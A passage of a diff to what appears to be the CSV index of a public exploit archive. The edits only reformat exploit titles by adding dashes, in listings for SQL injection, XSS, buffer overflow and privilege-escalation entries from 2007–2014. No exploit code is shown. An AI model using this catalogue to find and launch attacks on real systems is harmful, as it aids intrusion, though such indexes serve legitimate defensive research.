Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 -32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 - XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 advanced_search_result.php keywords Parameter XSS",2008-09-22,"David Vieira-Kurz",php,webapps,0 32404,platforms/php/webapps/32404.html,"fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",php,webapps,0 32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' Parameter SQL Injection",2008-09-22,0x90,php,webapps,0 @@ -27520,7 +27520,7 @@ id,file,description,date,author,platform,type,port 33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 -30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 +30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 URL Protocol Handler - Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30584,platforms/linux/dos/30584.py,"Boa 0.93.15 - Administrator Password Overwrite Authentication Bypass",2007-09-14,"Luca Carettoni",linux,dos,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 @@ -27541,7 +27541,7 @@ id,file,description,date,author,platform,type,port 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,php,webapps,0 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - wp-register.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 -30603,platforms/php/webapps/30603.html,"Xcms 1.1/1.7 Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 +30603,platforms/php/webapps/30603.html,"Xcms 1.1/1.7 Password Parameter - Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Local Privilege Escalation",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local,0 30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x - session.cgi Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 @@ -27617,7 +27617,7 @@ id,file,description,date,author,platform,type,port 31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps,0 30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos,0 30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 -30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script Cross-Site Scripting",2007-10-15,JosS,java,webapps,0 +30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,java,webapps,0 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal tc/contents/home001.jsp contentid Parameter XSS",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal msg.jsp msg Parameter XSS",2007-10-15,JosS,jsp,webapps,0 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0 @@ -27625,7 +27625,7 @@ id,file,description,date,author,platform,type,port 30679,platforms/hardware/dos/30679.pl,"Nortel Networks Multiple UNIStim VoIP Products Remote Eavesdrop",2007-10-18,"Daniel Stirnimann",hardware,dos,0 30680,platforms/windows/local/30680.txt,"Macrovision SafeDisc - SecDRV.SYS Method_Neither Local Privilege Escalation",2007-10-18,"Elia Florio",windows,local,0 30681,platforms/windows/local/30681.txt,"SpeedFan - Speedfan.sys Local Privilege Escalation",2007-10-18,"Ruben Santamarta ",windows,local,0 -30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 +30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 translator.php dir Parameter Traversal - Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 - index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0 @@ -27638,7 +27638,7 @@ id,file,description,date,author,platform,type,port 31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injection",2008-01-15,Xcross87,php,webapps,0 31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 -30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 +30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 - Lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 @@ -27649,12 +27649,12 @@ id,file,description,date,author,platform,type,port 30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 - Index.php SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - Download.php Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 -30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 -30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 -30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 +30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 +30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter - Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 +30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified - Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - Index.ASP SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 - Includes.php Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 -30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 +30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.ASP SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Remote Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.php Multiple SQL Injection",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service",2007-10-26,"The Hacker Webzine",multiple,dos,0 @@ -27663,11 +27663,11 @@ id,file,description,date,author,platform,type,port 30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.php Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 -30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.php SQL Injection",2007-10-29,netVigilance,php,webapps,0 -30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow",2007-10-29,anonymous,windows,remote,0 +30719,platforms/php/webapps/30719.txt,"Saxon 5.4 - Example.php SQL Injection",2007-10-29,netVigilance,php,webapps,0 +30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 - ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow",2007-10-29,anonymous,windows,remote,0 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 -30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 Scp.DLL Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 +30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - Scp.DLL Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27675,7 +27675,7 @@ id,file,description,date,author,platform,type,port 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection",2007-10-31,"Duncan Gilmore",linux,remote,0 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 -30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 +30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 - Index.php Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.php Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 @@ -27699,7 +27699,7 @@ id,file,description,date,author,platform,type,port 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - Login.php Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.php Cross-Site Scripting",2007-11-12,"Mesut Timur",php,webapps,0 30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - Index.php Denial of Service",2007-11-12,L4teral,php,dos,0 -30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 +30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF Index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-12,"Jan Fry",hardware,remote,0 30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 @@ -27710,7 +27710,7 @@ id,file,description,date,author,platform,type,port 30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 -30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 +30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 i386_set_ldt System Call Local - Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 and CPIO 2.5.90 safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 30768,platforms/multiple/remote/30768.txt,"IBM WebSphere Application Server 5.1.1 WebContainer HTTP Request Header Security Weakness",2007-11-15,anonymous,multiple,remote,0 @@ -27719,12 +27719,12 @@ id,file,description,date,author,platform,type,port 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0 -30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 +30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - Login.ASP Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0 30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 - Generic_API_Call.PL Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.ASP SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 -30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 +30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Local Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote,0 @@ -27738,7 +27738,7 @@ id,file,description,date,author,platform,type,port 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow",2014-01-07,Metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 30811,platforms/php/webapps/30811.txt,"SimpleGallery 0.1.3 - Index.php Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 -30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 Ierpplug.DLL PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos,0 +30812,platforms/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 - Ierpplug.DLL PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos,0 30813,platforms/php/webapps/30813.txt,"FMDeluxe 2.1 - Index.php Cross-Site Scripting",2007-11-26,JosS,php,webapps,0 30814,platforms/multiple/dos/30814.txt,"Skype 3.6.216 Voicemail URI Handler Remote Denial of Service",2007-11-26,"Critical Security",multiple,dos,0 30815,platforms/php/webapps/30815.txt,"Tilde 4.0 Aarstal Parameter Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 @@ -27751,14 +27751,14 @@ id,file,description,date,author,platform,type,port 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 /myalbum/ratephoto.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0 30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 modules/mylinks/ratelink.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0 -30825,platforms/windows/dos/30825.html,"Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow",2006-10-09,"Joxean Koret",windows,dos,0 +30825,platforms/windows/dos/30825.html,"Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow",2006-10-09,"Joxean Koret",windows,dos,0 30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service",2007-11-29,"Elazar Broad",windows,dos,0 +30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow Denial of Service",2007-11-29,"Elazar Broad",windows,dos,0 30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - My.Logon.php3 Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 @@ -27792,7 +27792,7 @@ id,file,description,date,author,platform,type,port 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 register.php Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 -30885,platforms/multiple/dos/30885.txt,"QK SMTP Server Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0 +30885,platforms/multiple/dos/30885.txt,"QK SMTP Server - Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 @@ -27807,7 +27807,7 @@ id,file,description,date,author,platform,type,port 30897,platforms/windows/remote/30897.html,"iMesh 7 - 'IMWebControl' ActiveX Control Code Execution",2007-12-17,rgod,windows,remote,0 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow",2007-11-06,wei_wang,linux,dos,0 30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 -30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 +30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows - Share PHP File Extension Mapping Information Disclosure",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service",2007-12-19,"Clemens Kurtenbach",linux,dos,0 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow",2007-12-19,"Luigi Auriemma",multiple,dos,0 30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x - main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0 @@ -27839,7 +27839,7 @@ id,file,description,date,author,platform,type,port 30930,platforms/php/webapps/30930.txt,"Logaholic index.php parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0 30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0 -30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 +30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message - Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 30934,platforms/windows/dos/30934.txt,"Total Player 3.0 M3U File Denial of Service",2007-12-25,"David G.M.",windows,dos,0 30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 @@ -27904,7 +27904,7 @@ id,file,description,date,author,platform,type,port 31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/user/main.jsp activeControl Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 -31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 +31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g - XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps,0 31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting",2008-01-31,"Tomasz Kuczynski",php,webapps,0 31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery",2008-01-15,hkm,hardware,remote,0 @@ -27928,7 +27928,7 @@ id,file,description,date,author,platform,type,port 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0 31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 -31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 +31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template - 'gallery' Parameter Cross-Site Scripting",2008-01-21,trew,php,webapps,0 31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Inclusion",2008-01-21,anonymous,php,webapps,0 31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow",2008-01-09,Knell,windows,remote,0 @@ -27953,7 +27953,7 @@ id,file,description,date,author,platform,type,port 